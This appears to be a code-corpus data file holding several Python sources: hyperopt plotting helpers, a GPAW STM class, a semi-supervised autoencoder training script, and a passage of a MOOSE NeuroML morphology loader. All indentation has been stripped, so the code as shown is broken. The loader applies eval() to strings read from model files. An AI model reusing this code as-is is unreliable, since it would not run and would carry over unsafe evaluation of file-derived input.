pbest_sampled(
[vscore for (vscore,tscore) in scores_i],
n_valid,
n_samples=pbest_n_samples,
rng=rng))
#print rval
return rval
if n_batches_of_K < 10:
# use scatter plot
for i in xrange(n_batches_of_K):
scatter_x.append(log_K+1)
scatter_y.append(best_score(i))
scatter_c.append((0,0,0))
box_x.append([])
else:
# use box plot
box_x.append([best_score(i) for i in xrange(n_batches_of_K)])
K *= 2
log_K += 1
plt.scatter( scatter_x, scatter_y, c=scatter_c, marker='+', linewidths=0.2,
edgecolors=scatter_c)
boxplot_lines = plt.boxplot(box_x)
for key in boxplot_lines:
plt.setp(boxplot_lines[key], color='black')
#plt.setp(boxplot_lines['medians'], color=(.5,.5,.5))
# draw the spans
#
# the 'test performance of the best model' is a mixture of gaussian-distributed quantity
# with components comp_mean, and comp_var and weights w
#
# w[i] is prob. of i'th model being best in validation
w = pbest_sampled([vs for (vs,ts) in scores], n_valid, n_samples=pbest_n_samples, rng=rng)
comp_mean = np.asarray([ts for (vs,ts) in scores])
comp_var = (comp_mean * (1-comp_mean)) / (n_test-1)
# the mean of the mixture is
mean = np.dot(w, comp_mean)
#the variance of the mixture is
var = np.dot(w, comp_mean**2 + comp_var) - mean**2
# test average is distributed according to a mixture of gaussians, so we have to use the following fo
std = math.sqrt(var)
#plt.axhline(mean, color=(1.0,1.0,1.0), linestyle='--', linewidth=0.1)
#plt.axhspan(mean-1.96*std, mean+1.96*std, color=(0.5,0.5,0.5))
plt.axhline(mean-1.96*std, color=(0.0,0.0,0.0))
plt.axhline(mean+1.96*std, color=(0.0,0.0,0.0))
# get margin:
if 0:
margin = 1.0 - mean
plt.ylim(0.5-margin, 1.0 )
# set ticks
ticks_num, ticks_txt = plt.xticks()
plt.xticks(ticks_num, ['%i'%(2**i) for i in xrange(len(ticks_num))])
def rexp_pairs_raw(x, y, vscores):
if len(x) != len(y): raise ValueError()
if len(x) != len(vscores): raise ValueError()
vxy = zip(vscores, x, y)
vxy.sort()
vscores, x, y = zip(*vxy)
vscores = np.asarray(vscores)
max_score = vscores.max()
min_score = vscores.min()
colors = np.outer(0.9 - 0.89*(vscores - min_score)/(max_score- min_score), [1,1,1])
plt.scatter( x, y, c=colors, marker='o', linewidths=0.1)
#remove ticks labels
nums, texts = plt.xticks()
plt.xticks(nums, ['']*len(nums))
nums, texts = plt.yticks()
plt.yticks(nums, ['']*len(nums))
class CoordType(object):pass
class RealCoord(CoordType):
@staticmethod
def preimage(x): return np.asarray(x)
class LogCoord(CoordType):
@staticmethod
def preimage(x): return np.log(x)
class Log0Coord(CoordType):
@staticmethod
def preimage(x):
x = np.asarray(x)
return np.log(x+(x==0)*x.min()/2)
IntCoord = RealCoord
LogIntCoord = LogCoord
class CategoryCoord(CoordType):
def __init__(self, categories=None):
self.categories = categories
def preimage(self, x):
if self.categories:
return np.asarray([self.categories.index(xi) for xi in x])
else:
return x
def rexp_pairs(x, y, vscores, xtype, ytype):
return rexp_pairs_raw(xtype.preimage(x), ytype.preimage(y), vscores)
class MultiHistory(object):
"""
Show the history of multiple optimization algorithms.
"""
def __init__(self):
self.histories = []
def add_experiment(self, mj, y_fn, start=0, stop=sys.maxint,
color=None,
label=None):
trials = [(job['book_time'], job, y_fn(job))
for job in mj if ('book_time' in job
and y_fn(job) is not None
and np.isfinite(y_fn(job)))]
trials.sort()
trials = trials[start:stop]
if trials:
self.histories.append((
[t[1] for t in trials],
[t[2] for t in trials],
color, label))
else:
print 'NO TRIALS'
def add_scatters(self):
for t, y, c, l in self.histories:
print 'setting label', l
plt.scatter(
np.arange(len(y)),
y,
c=c,
label=l,
s=12)
def main_show(self, title=None):
self.add_scatters()
if title:
plt.title(title)
#plt.axvline(25) # make a parameter
#plt.axhline(.2)
#plt.axhline(.3)
plt.show()
def main_plot_histories(cls):
import plotting
conn_str_template = sys.argv[2]
algos = sys.argv[3].split(',')
dataset_name = sys.argv[4]
start = int(sys.argv[5]) if len(sys.argv)>5 else 0
stop = int(sys.argv[6]) if len(sys.argv)>6 else sys.maxint
mh = plotting.MultiHistory()
colors = ['r', 'y', 'b', 'g', 'c', 'k']
def custom_err_fn(trial):
if 2 == trial['status']:
rval = 1.0 - trial['result']['best_epoch_valid']
if rval > dict(
convex=.4,
mnist_rotated_background_images=2)[dataset_name]:
return None
else:
return rval
for c, algo in zip(colors, algos):
conn_str = conn_str_template % (algo, dataset_name)
print 'algo', algo
mh.add_experiment(
mj=MongoJobs.new_from_connection_str(conn_str),
y_fn=custom_err_fn,
color=c,
label=algo,
start=start,
stop=stop)
plt = plotting.plt
plt.axhline(
1.0 - icml07.dbn3_scores[dataset_name],
c='k',label='manual+grid')#, dashes=[0,1])
mh.add_scatters()
plt.legend()
plt.title(dataset_name)
plt.show()
class ScatterByConf(object):
trial_color_dict = {0:'k', 1:'g', 2:'b', 3:'r'}
def __init__(self, conf_template, confs, status, y):
self.conf_template = conf_template
self.confs = confs
self.y = np.asarray(y)
assert self.y.ndim == 1
self.status = status
self.colors = np.asarray(
[self.trial_color_dict.get(s, None) for s in self.status])
self.a_choices = np.array([[e['choice']
for e in t.flatten()]
for t in confs])
self.nones = np.array([[None
for e in t.flatten()]
for t in confs])
self.a_names = conf_template.flatten_names()
self.a_vars = [not np.all(self.a_choices[:,i]==self.nones[:,i])
for i,name in enumerate(self.a_names)]
assert len(self.y) == len(self.a_choices)
assert len(self.y) == len(self.colors)
def trial_color(self, t):
return self.trial_color_dict.get(t['status'], None)
def scatter_one(self, column):
assert self.a_vars[column]
non_missing = self.a_choices[:,column] != self.nones[:,column]
x = self.a_choices[non_missing, column]
y = self.y[non_missing]
c = self.colors[non_missing]
plt.xlabel(self.a_names[column])
plt.scatter(x, y, c=c)
def main_show_one(self, column):
# show all conf effects in a grid of scatter-plots
self.scatter_one(column)
plt.show()
def main_show_all(self, columns=None):
if columns == None:
columns = range(len(self.a_vars))
columns = [c for c in columns if c < len(self.a_vars)]
n_vars = np.sum(self.a_vars[c] for c in columns)
print n_vars
n_rows = 1
n_cols = 10000
n_vars -= 1
while n_cols > 5 and n_cols > 3 * n_rows: # while "is ugly"
n_vars += 1 # leave one more space at the end...
n_rows = int(np.sqrt(n_vars))
while n_vars % n_rows:
n_rows -= 1
n_cols = n_vars / n_rows
print n_rows, n_cols
subplot_idx = 0
for var_idx in columns:
if self.a_vars[var_idx]:
plt.subplot(n_rows, n_cols, subplot_idx+1)
self.scatter_one(var_idx)
subplot_idx += 1
plt.show()
def main_plot_scatter(self, argv):
low_col = int(argv[0])
high_col = int(argv[1])
# upgrade jobs in db to ht_dist2-compatible things
scatter_by_conf = ScatterByConf(
self.bandit.template,
self.trials,
status = self.statuses(),
y = self.losses())
return scatter_by_conf.main_show_all(range(low_col, high_col))
| CVML/hyperopt | hyperopt/plotting.py | Python | bsd-3-clause | 19,940 | [
"Gaussian"
] | be6b7e65009b3a022833e7c43f664ead2d567d6074aa355e411da774930df3dc |
import numpy as np
from ase.units import Bohr
from gpaw import Calculator
from gpaw.localized_functions import create_localized_functions as clf
class STM:
def __init__(self, surfacecalc, tipcalc):
self.scalc = surfacecalc
self.tcalc = tipcalc
self.surface = surfacecalc.get_atoms()
self.tip = tipcalc.get_atoms()
def initialize(self):
tip = self.tip.copy()
htip = tip.get_cell()[2, 2]
#tip.translate((0, 0, htip))
self.combined = self.surface + tip
self.combined.cell[2, 2] += htip
self.calc = Calculator(h=0.2, eigensolver='lcao', basis='sz',
txt=None)
#self.combined.set_calculator(self.calc)
self.calc.initialize(self.combined)
self.calc.hamiltonian.initialize(self.calc)
self.calc.density.initialize()
self.vtip_G = self.tcalc.hamiltonian.vt_sG[0]
self.vsurface_G = self.scalc.hamiltonian.vt_sG[0]
self.get_basis_functions()
self.tgd = self.tcalc.wfs.gd
self.sgd = self.scalc.wfs.gd
def get_basis_functions(self):
gd = self.calc.wfs.gd
self.functions = []
for nucleus in self.calc.nuclei:
spos0_c = np.round(nucleus.spos_c * gd.N_c) / gd.N_c
f_iG = clf(nucleus.setup.phit_j, gd,
nucleus.spos_c + 0.5 - spos0_c,
dtype=float, cut=False,
forces=False, lfbc=None).box_b[0].get_functions()
self.functions.append((spos0_c, f_iG))
def set_position(self, dG):
positions = self.combined.get_positions()
tippositions = self.tip.get_positions()
tippositions += dG * self.calc.wfs.gd.h_c / Bohr
positions[-len(self.tip):] = tippositions
self.combined.set_positions(positions)
self.calc.set_positions(self.combined)
self.calc.hamiltonian.initialize_lcao()
| qsnake/gpaw | gpaw/stm/__init__.py | Python | gpl-3.0 | 1,977 | [
"ASE",
"GPAW"
] | 3dd55e08a88cf4207b1fd6cec3a6f8fe33679330d5c7b8af13239b1efc09d26e |
import numpy as np
import argparse
from time import time
from builder.args import addLoggingParams, addDebuggingParams, \
addEarlyStop, addSupDataParams
from builder.profiler import setupLogging
from ae.net import TrainerSAENetwork
from ae.contiguousAE import ContiguousAutoEncoder
from ae.convolutionalAE import ConvolutionalAutoEncoder
from dataset.ingest.labeled import ingestImagery
from nn.contiguousLayer import ContiguousLayer
from nn.trainUtils import trainUnsupervised, trainSupervised
from nn.net import TrainerNetwork
if __name__ == '__main__' :
'''This application runs semi-supervised training on a given dataset. The
utimate goal is to setup the early layers of the Neural Network to
identify pattern in the data unsupervised learning. Here we used a
Stacked Autoencoder (SAE) and greedy training.
We then translate the SAE to a Neural Network (NN) and add a
classification layer. From there we use supervised training to fine-tune
the weights to classify objects we select as important.
'''
parser = argparse.ArgumentParser()
addDebuggingParams(parser)
addLoggingParams(parser)
parser.add_argument('--learnC', dest='learnC', type=float, default=.0031,
help='Rate of learning on Convolutional Layers.')
parser.add_argument('--learnF', dest='learnF', type=float, default=.0015,
help='Rate of learning on Fully-Connected Layers.')
parser.add_argument('--contrF', dest='contrF', type=float, default=None,
help='Rate of contraction of the latent space on ' +
'Fully-Connected Layers.')
parser.add_argument('--momentum', dest='momentum', type=float, default=.3,
help='Momentum rate all layers.')
parser.add_argument('--dropout', dest='dropout', type=bool, default=False,
help='Enable dropout throughout the network. Dropout '\
'percentages are based on optimal reported '\
'results. NOTE: Networks using dropout need to '\
'increase both neural breadth and learning rates')
parser.add_argument('--kernel', dest='kernel', type=int, default=6,
help='Number of Convolutional Kernels in each Layer.')
parser.add_argument('--neuron', dest='neuron', type=int, default=120,
help='Number of Neurons in Hidden Layer.')
addEarlyStop(parser)
addSupDataParams(parser, 'leNet5')
options = parser.parse_args()
# setup the logger
log, prof = setupLogging(options, 'semiSupervisedTrainer')
# create a random number generator for efficiency
from numpy.random import RandomState
rng = RandomState(int(time()))
# NOTE: The pickleDataset will silently use previously created pickles if
# one exists (for efficiency). So watch out for stale pickles!
train, test, labels = ingestImagery(filepath=options.data, shared=True,
batchSize=options.batchSize,
holdoutPercentage=options.holdout,
log=log)
trainShape = train[0].shape.eval()
# create the stacked network
network = TrainerSAENetwork(train, greedyNetwork=options.greedyNet,
prof=prof, debug=options.debug)
if options.synapse is not None :
# load a previously saved network
network.load(options.synapse)
# reset the learning rates
network.setLayerLearningRate(0, options.learnC)
network.setLayerLearningRate(1, options.learnC)
network.setLayerLearningRate(2, options.learnF)
network.setLayerLearningRate(3, options.learnF)
# reset the momentum ratez
network.setLayerMomentumRate(0, options.momentum)
network.setLayerMomentumRate(1, options.momentum)
network.setLayerMomentumRate(2, options.momentum)
network.setLayerMomentumRate(3, options.momentum)
else :
log.info('Initializing Network...')
# add convolutional layers
network.addLayer(ConvolutionalAutoEncoder(
layerID='c1', inputSize=trainShape[1:],
kernelSize=(options.kernel,trainShape[2],5,5),
downsampleFactor=(2,2), randomNumGen=rng,
dropout=.8 if options.dropout else 1.,
learningRate=options.learnC))
# refactor the output to be (numImages*numKernels,1,numRows,numCols)
# this way we don't combine the channels kernels we created in
# the first layer and destroy our dimensionality
network.addLayer(ConvolutionalAutoEncoder(
layerID='c2', inputSize=network.getNetworkOutputSize(),
kernelSize=(options.kernel,options.kernel,5,5),
downsampleFactor=(2,2), randomNumGen=rng,
dropout=.5 if options.dropout else 1.,
learningRate=options.learnC))
# add fully connected layers
network.addLayer(ContiguousAutoEncoder(
layerID='f3',
inputSize=(network.getNetworkOutputSize()[0],
np.prod(network.getNetworkOutputSize()[1:])),
numNeurons=options.neuron, learningRate=options.learnF,
dropout=.5 if options.dropout else 1.,
randomNumGen=rng))
# the final output layer is removed from the normal NN --
# the output layer is special, as it makes decisions about
# patterns identified in previous layers, so it should only
# be influenced/trained during supervised learning.
# train the SAE for unsupervised pattern recognition
bestNetwork = trainUnsupervised(network, __file__, options.data,
numEpochs=options.limit, stop=options.stop,
synapse=options.synapse, base=options.base,
log=log)
# translate into a neural network --
# this transfers our unsupervised pre-training into a decent
# starting condition for our supervised learning
network = TrainerNetwork(train, test, labels, filepath=bestNetwork,
prof=prof, debug=options.debug)
# add the classification layer
network.addLayer(ContiguousLayer(
layerID='f4', input=network.getNetworkOutput(),
inputSize=network.getNetworkOutputSize(), numNeurons=labels.shape[0],
learningRate=options.learnF, randomNumGen=rng))
# train the NN for supervised classification
trainSupervised(network, __file__, options.data,
numEpochs=options.limit, stop=options.stop,
synapse=options.synapse, base=options.base, log=log)
| mbojrab/playbox | trunk/projects/supervised/semiSupervisedTrainer.py | Python | mit | 6,842 | [
"NEURON"
] | aadfb04c709208d87300ffb9a39e027bdf6b453596bfe6491b1d75971e1b66ad |
# -*- coding: utf-8 -*-
## Description: class MorphML for loading MorphML from file or xml element into MOOSE
## Version 1.0 by Aditya Gilra, NCBS, Bangalore, India, 2011 for serial MOOSE
## Version 1.5 by Niraj Dudani, NCBS, Bangalore, India, 2012, ported to parallel MOOSE
## Version 1.6 by Aditya Gilra, NCBS, Bangalore, India, 2012, further changes for parallel MOOSE
## Version 1.7 by Aditya Gilra, NCBS, Bangalore, India, 2013, further support for NeuroML 1.8.1
## Version 1.8 by Aditya Gilra, NCBS, Bangalore, India, 2013, changes for new IntFire and SynHandler classes
"""
NeuroML.py is the preferred interface. Use this only if NeuroML L1,L2,L3 files are misnamed/scattered.
Instantiate MorphML class, and thence use methods:
readMorphMLFromFile(...) to load a standalone MorphML from file OR
readMorphML(...) to load from an xml.etree xml element (could be part of a larger NeuroML file).
It is assumed that any channels and synapses referred to by above MorphML
have already been loaded under that same name in /library in MOOSE (use ChannelML loader).
"""
from __future__ import print_function
from xml.etree import cElementTree as ET # cELementTree is mostly API-compatible but faster than ElementTree
import string
import sys
import math
from os import path
import moose
from moose import utils as moose_utils
from moose.neuroml import utils as neuroml_utils
from moose.neuroml.ChannelML import ChannelML, make_new_synapse
import logging
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('moose.nml.morphml').addHandler(console)
_logger = logging.getLogger('')
class MorphML():
def __init__(self,nml_params):
self.neuroml='http://morphml.org/neuroml/schema'
self.bio='http://morphml.org/biophysics/schema'
self.mml='http://morphml.org/morphml/schema'
self.nml='http://morphml.org/networkml/schema'
self.meta='http://morphml.org/metadata/schema'
self.cellDictBySegmentId={}
self.cellDictByCableId={}
self.nml_params = nml_params
self.model_dir = nml_params['model_dir']
self.temperature = nml_params['temperature']
def readMorphMLFromFile(self,filename,params={}):
"""
specify params for this MorphML file as a dict:
presently combineSegments and createPotentialSynapses are implemented.
See readMorphML().
See also nml_params in __init__().
returns { cellname1 : (segDict,cableDict), ... }
see readMorphML(...) for segDict and cableDict
"""
_logger.info("Reading morphology from %s" % filename)
try:
tree = ET.parse(filename)
except Exception as e:
_logger.error("Failed to load morphology from file %s" % filename)
neuroml_element = tree.getroot()
cellsDict = {}
for cell in neuroml_element.findall('.//{'+self.neuroml+'}cell'):
if 'lengthUnits' in neuroml_element.attrib:
lengthUnits = neuroml_element.attrib['lengthUnits']
else:
lengthUnits = 'micrometer'
cellDict = self.readMorphML(cell,params,lengthUnits)
cellsDict.update(cellDict)
return cellsDict
def readMorphML(self,cell,params={},lengthUnits="micrometer"):
"""
returns cellDict = { cellname: (segDict, cableDict) } # note: single cell only
where segDict = { segid1 : [ segname,(proximalx,proximaly,proximalz),
(distalx,distaly,distalz),diameter,length,[potential_syn1, ... ] ] , ... }
segname is "<name>_<segid>" because 1) guarantees uniqueness,
& 2) later scripts obtain segid from the compartment's name!
and cableDict = { cablegroupname : [campartment1name, compartment2name, ... ], ... }.
params is dict which can contain, combineSegments and/or createPotentialSynapses,
both boolean.
"""
if lengthUnits in ['micrometer','micron']:
self.length_factor = 1e-6
else:
self.length_factor = 1.0
cellname = cell.attrib["name"]
moose.Neutral('/library') # creates /library in MOOSE tree; elif present, wraps
_logger.info("Loading cell %s into /library ." % cellname)
#~ moosecell = moose.Cell('/library/'+cellname)
#using moose Neuron class - in previous version 'Cell' class Chaitanya
moosecell = moose.Neuron('/library/'+cellname)
self.cellDictBySegmentId[cellname] = [moosecell,{}]
self.cellDictByCableId[cellname] = [moosecell,{}]
self.segDict = {}
if 'combineSegments' in params:
self.combineSegments = params['combineSegments']
else:
self.combineSegments = False
if 'createPotentialSynapses' in params:
self.createPotentialSynapses = params['createPotentialSynapses']
else:
self.createPotentialSynapses = False
_logger.info("readMorphML using combineSegments = %s" % self.combineSegments)
###############################################
#### load cablegroups into a dictionary
self.cablegroupsDict = {}
self.cablegroupsInhomoparamsDict = {}
## Two ways of specifying cablegroups in neuroml 1.x
## <cablegroup>s with list of <cable>s
cablegroups = cell.findall(".//{"+self.mml+"}cablegroup")
for cablegroup in cablegroups:
cablegroupname = cablegroup.attrib['name']
self.cablegroupsDict[cablegroupname] = []
self.cablegroupsInhomoparamsDict[cablegroupname] = []
for cable in cablegroup.findall(".//{"+self.mml+"}cable"):
cableid = cable.attrib['id']
self.cablegroupsDict[cablegroupname].append(cableid)
# parse inhomogenous_params
for inhomogeneous_param in cablegroup.findall(".//{"+self.mml+"}inhomogeneous_param"):
metric = inhomogeneous_param.find(".//{"+self.mml+"}metric")
if metric.text == 'Path Length from root':
inhomoparamname = inhomogeneous_param.attrib['name']
inhomoparamvar = inhomogeneous_param.attrib['variable']
self.cablegroupsInhomoparamsDict[cablegroupname].append(\
(inhomoparamname,inhomoparamvar))
else:
_logger.warning('Only "Path Length from root" metric is '
' supported currently, ignoring %s ' % metric.text
)
## <cable>s with list of <meta:group>s
cables = cell.findall(".//{"+self.mml+"}cable")
for cable in cables:
cableid = cable.attrib['id']
cablegroups = cable.findall(".//{"+self.meta+"}group")
for cablegroup in cablegroups:
cablegroupname = cablegroup.text
if cablegroupname in self.cablegroupsDict:
self.cablegroupsDict[cablegroupname].append(cableid)
else:
self.cablegroupsDict[cablegroupname] = [cableid]
###################################################
## load all mechanisms in this cell into /library for later copying
## set which compartments have integrate_and_fire mechanism
self.intFireCableIds = {} # dict with keys as Compartments/cableIds which are IntFire
# with mechanismnames as values
for mechanism in cell.findall(".//{"+self.bio+"}mechanism"):
mechanismname = mechanism.attrib["name"]
passive = False
if "passive_conductance" in mechanism.attrib:
if mechanism.attrib['passive_conductance'] in ["true",'True','TRUE']:
passive = True
if not passive:
## if channel does not exist in library load it from xml file
if not moose.exists("/library/"+mechanismname):
_logger.info("Loading mechanism %s into library." % mechanismname)
cmlR = ChannelML(self.nml_params)
model_filename = mechanismname+'.xml'
model_path = neuroml_utils.find_first_file(model_filename,self.model_dir)
if model_path is not None:
cmlR.readChannelMLFromFile(model_path)
else:
raise IOError(
'For mechanism {0}: files {1} not found under {2}.'.format(
mechanismname, model_filename, self.model_dir)
)
## set those compartments to be LIF for which
## any integrate_and_fire parameter is set
if not moose.exists( "/library/"+mechanismname):
_logger.warn("Mechanism doesn't exist: %s " % mechanismname)
moose.le( '/library' )
moosemech = moose.element("/library/"+mechanismname)
if moose.exists(moosemech.path+"/integrate_and_fire"):
mooseIaF = moose.element(moosemech.path+"/integrate_and_fire") # Mstring
if mooseIaF.value in ['true','True','TRUE']:
mech_params = mechanism.findall(".//{"+self.bio+"}parameter")
for parameter in mech_params:
parametername = parameter.attrib['name']
## check for the integrate_and_fire parameters
if parametername in ['threshold', 't_refrac', 'v_reset','g_refrac']:
for group in parameter.findall(".//{"+self.bio+"}group"):
cablegroupname = group.text
if cablegroupname == 'all':
self.intFireCableIds = {'all':mechanismname}
break
else:
for cableid in self.cablegroupsDict[cablegroupname]:
## only one intfire mechanism is allowed in a cable
## the last one parsed will override others
self.intFireCableIds[cableid] = mechanismname
if 'all' in self.intFireCableIds:
break
############################################################
#### load morphology and connections between compartments
## Many neurons exported from NEURON have multiple segments in a section
## If self.combineSegments = True,
## then combine those segments into one Compartment / section
## for combining, assume segments of a compartment/section are in increasing order
## and assume all segments of a compartment/section have the same cableid
## findall() returns elements in document order:
running_cableid = ''
running_segid = ''
running_comp = None
running_diameter = 0.0
running_dia_nums = 0
segments = cell.findall(".//{"+self.mml+"}segment")
segmentstotal = len(segments)
for segnum,segment in enumerate(segments):
segmentname = segment.attrib['name']
## cable is an optional attribute. WARNING: Here I assume it is always present.
cableid = segment.attrib['cable']
segmentid = segment.attrib['id']
## if old cableid still running AND self.combineSegments == True,
## then don't start a new compartment, skip to next segment
if cableid == running_cableid and self.combineSegments:
self.cellDictBySegmentId[cellname][1][segmentid] = running_comp
proximal = segment.find('./{'+self.mml+'}proximal')
if proximal is not None:
running_diameter += float(proximal.attrib["diameter"]) * self.length_factor
running_dia_nums += 1
distal = segment.find('./{'+self.mml+'}distal')
if distal is not None:
running_diameter += float(distal.attrib["diameter"]) * self.length_factor
running_dia_nums += 1
## if (self.combineSegments and new cableid starts) or if not self.combineSegments,
## then start a new compartment
else:
## Create a new compartment
## the moose "hsolve" method assumes compartments to be
## asymmetric compartments and symmetrizes them
## but that is not what we want when translating
## from Neuron which has only symcompartments -- so be careful!
## Check if integrate_and_fire mechanism is present,
## if so use LIF instead of Compartment
moosecompname = segmentname+'_'+segmentid # just segmentname is NOT unique
# eg: mitral bbmit exported from NEURON
moosecomppath = moosecell.path+'/'+moosecompname
mechanismname = None
if 'all' in self.intFireCableIds:
mechanismname = self.intFireCableIds['all']
if cableid in self.intFireCableIds:
mechanismname = self.intFireCableIds[cableid]
if mechanismname is not None: # this cableid is an intfire
# create LIF (subclass of Compartment) and set to default values
moosecomp = moose.LIF(moosecomppath)
mname = '/library/' + mechanismname
moosechannel = moose.element(mname) if moose.exists(mname) else moose.Neutral(mname)
# Mstring values are 'string'; make sure to convert them to
# float else it will seg-fault with python3+
moosechannelval = moose.Mstring(moosechannel.path+'/vReset')
moosecomp.vReset = float(moosechannelval.value)
moosechannelval = moose.Mstring(moosechannel.path+'/thresh')
moosecomp.thresh = float( moosechannelval.value )
moosechannelval = moose.Mstring(moosechannel.path+'/refracT')
moosecomp.refractoryPeriod = eval(moosechannelval.value)
## refracG is currently not supported by moose.LIF
## when you implement it, check if refracG or g_refrac
## is a conductance density or a conductance, I think the former
#moosechannelval = moose.Mstring(moosechannel.path+'/refracG')
else:
moosecomp = moose.Compartment(moosecomppath)
self.cellDictBySegmentId[cellname][1][segmentid] = moosecomp
## cables are grouped and mechanism densities are set for cablegroups later.
## hence I will need to refer to segment according to which cable it belongs to.
## if combineSegments is False, there can be multiple segments per cable,
## so make array of compartments for cellDictByCableId[cellname][1][cableid]
if cableid in self.cellDictByCableId[cellname][1]:
self.cellDictByCableId[cellname][1][cableid].append(moosecomp)
else:
self.cellDictByCableId[cellname][1][cableid] = [moosecomp]
running_cableid = cableid
running_segid = segmentid
running_comp = moosecomp
running_diameter = 0.0
running_dia_nums = 0
if 'parent' in segment.attrib:
parentid = segment.attrib['parent'] # I assume the parent is created before the child
# so that I can immediately connect the child.
parent = self.cellDictBySegmentId[cellname][1][parentid]
## It is always assumed that axial of parent is connected to raxial of moosesegment
## THIS IS WHAT GENESIS readcell() DOES!!! UNLIKE NEURON!
## THIS IS IRRESPECTIVE OF WHETHER PROXIMAL x,y,z OF PARENT = PROXIMAL x,y,z OF CHILD.
## THIS IS ALSO IRRESPECTIVE OF fraction_along_parent SPECIFIED IN CABLE!
## THUS THERE WILL BE NUMERICAL DIFFERENCES BETWEEN MOOSE/GENESIS and NEURON.
## moosesegment sends Ra and Vm to parent, parent sends only Vm
## actually for symmetric compartment, both parent and moosesegment require each other's Ra/2,
## but axial and raxial just serve to distinguish ends.
moose.connect(parent,'axial',moosecomp,'raxial')
else:
parent = None
proximal = segment.find('./{'+self.mml+'}proximal')
if proximal is None: # If proximal tag is not present,
# then parent attribute MUST be present in the segment tag!
## if proximal is not present, then
## by default the distal end of the parent is the proximal end of the child
moosecomp.x0 = parent.x
moosecomp.y0 = parent.y
moosecomp.z0 = parent.z
else:
moosecomp.x0 = float(proximal.attrib["x"])*self.length_factor
moosecomp.y0 = float(proximal.attrib["y"])*self.length_factor
moosecomp.z0 = float(proximal.attrib["z"])*self.length_factor
running_diameter += float(proximal.attrib["diameter"]) * self.length_factor
running_dia_nums += 1
distal = segment.find('./{'+self.mml+'}distal')
if distal is not None:
running_diameter += float(distal.attrib["diameter"]) * self.length_factor
running_dia_nums += 1
## finished creating new compartment
## Update the end position, diameter and length, and segDict of this comp/cable/section
## with each segment that is part of this cable (assumes contiguous segments in xml).
## This ensures that we don't have to do any 'closing ceremonies',
## if a new cable is encoutered in next iteration.
if distal is not None:
running_comp.x = float(distal.attrib["x"])*self.length_factor
running_comp.y = float(distal.attrib["y"])*self.length_factor
running_comp.z = float(distal.attrib["z"])*self.length_factor
## Set the compartment diameter as the average diameter of all the segments in this section
running_comp.diameter = running_diameter / float(running_dia_nums)
## Set the compartment length
running_comp.length = math.sqrt((running_comp.x-running_comp.x0)**2+\
(running_comp.y-running_comp.y0)**2+(running_comp.z-running_comp.z0)**2)
## NeuroML specs say that if (x0,y0,z0)=(x,y,z), then round compartment e.g. soma.
## In Moose set length = dia to give same surface area as sphere of dia.
if running_comp.length == 0.0:
running_comp.length = running_comp.diameter
## Set the segDict
## the empty list at the end below will get populated
## with the potential synapses on this segment, in function set_compartment_param(..)
self.segDict[running_segid] = [running_comp.name,\
(running_comp.x0,running_comp.y0,running_comp.z0),\
(running_comp.x,running_comp.y,running_comp.z),\
running_comp.diameter,running_comp.length,[]]
if neuroml_utils.neuroml_debug:
_logger.info('Set up compartment/section %s' % running_comp.name)
###############################################
#### load biophysics into the compartments
biophysics = cell.find(".//{"+self.neuroml+"}biophysics")
if biophysics is not None:
## see pg 219 (sec 13.2) of Book of Genesis for Physiological Units
if biophysics.attrib["units"] == 'Physiological Units':
CMfactor = 1e-2 # F/m^2 from microF/cm^2
Cfactor = 1e-6 # F from microF
RAfactor = 1e1 # Ohm*m from KOhm*cm
RMfactor = 1e-1 # Ohm*m^2 from KOhm*cm^2
Rfactor = 1e-3 # Ohm from KOhm
Efactor = 1e-3 # V from mV
Gfactor = 1e1 # S/m^2 from mS/cm^2
Ifactor = 1e-6 # A from microA
Tfactor = 1e-3 # s from ms
else:
CMfactor = 1.0
Cfactor = 1.0
RAfactor = 1.0
RMfactor = 1.0
Rfactor = 1.0
Efactor = 1.0
Gfactor = 1.0
Ifactor = 1.0
Tfactor = 1.0
spec_capacitance = cell.find(".//{"+self.bio+"}spec_capacitance")
for parameter in spec_capacitance.findall(".//{"+self.bio+"}parameter"):
self.set_group_compartment_param(cell, cellname, parameter,\
'CM', float(parameter.attrib["value"])*CMfactor, self.bio)
spec_axial_resitance = cell.find(".//{"+self.bio+"}spec_axial_resistance")
for parameter in spec_axial_resitance.findall(".//{"+self.bio+"}parameter"):
self.set_group_compartment_param(cell, cellname, parameter,\
'RA', float(parameter.attrib["value"])*RAfactor, self.bio)
init_memb_potential = cell.find(".//{"+self.bio+"}init_memb_potential")
for parameter in init_memb_potential.findall(".//{"+self.bio+"}parameter"):
self.set_group_compartment_param(cell, cellname, parameter,\
'initVm', float(parameter.attrib["value"])*Efactor, self.bio)
chan_distrib = [] # the list for moose to parse inhomogeneous params (filled below)
for mechanism in cell.findall(".//{"+self.bio+"}mechanism"):
mechanismname = mechanism.attrib["name"]
passive = False
if "passive_conductance" in mechanism.attrib:
if mechanism.attrib['passive_conductance'] in ["true",'True','TRUE']:
passive = True
_logger.info("Loading mechanism %s " % mechanismname)
## ONLY creates channel if at least one parameter (like gmax) is specified in the xml
## Neuroml does not allow you to specify all default values.
## However, granule cell example in neuroconstruct has Ca ion pool without
## a parameter, applying default values to all compartments!
mech_params = mechanism.findall(".//{"+self.bio+"}parameter")
## if no params, apply all default values to all compartments
if len(mech_params) == 0:
for compartment_list in self.cellDictByCableId[cellname][1].values():
for compartment in compartment_list:
self.set_compartment_param(compartment,None,'default',mechanismname)
## if params are present, apply params to specified cable/compartment groups
for parameter in mech_params:
parametername = parameter.attrib['name']
if passive:
if parametername in ['gmax']:
self.set_group_compartment_param(cell, cellname, parameter,\
'RM', RMfactor*1.0/float(parameter.attrib["value"]), self.bio)
elif parametername in ['e','erev']:
self.set_group_compartment_param(cell, cellname, parameter,\
'Em', Efactor*float(parameter.attrib["value"]), self.bio)
elif parametername in ['inject']:
self.set_group_compartment_param(cell, cellname, parameter,\
'inject', Ifactor*float(parameter.attrib["value"]), self.bio)
else:
_logger.warning(["Yo programmer of MorphML! You didn't"
, " implement parameter %s " % parametername
, " in mechanism %s " % mechanismname
]
)
else:
if parametername in ['gmax']:
gmaxval = float(eval(parameter.attrib["value"],{"__builtins__":None},{}))
self.set_group_compartment_param(cell, cellname, parameter,\
'Gbar', Gfactor*gmaxval, self.bio, mechanismname)
elif parametername in ['e','erev']:
self.set_group_compartment_param(cell, cellname, parameter,\
'Ek', Efactor*float(parameter.attrib["value"]), self.bio, mechanismname)
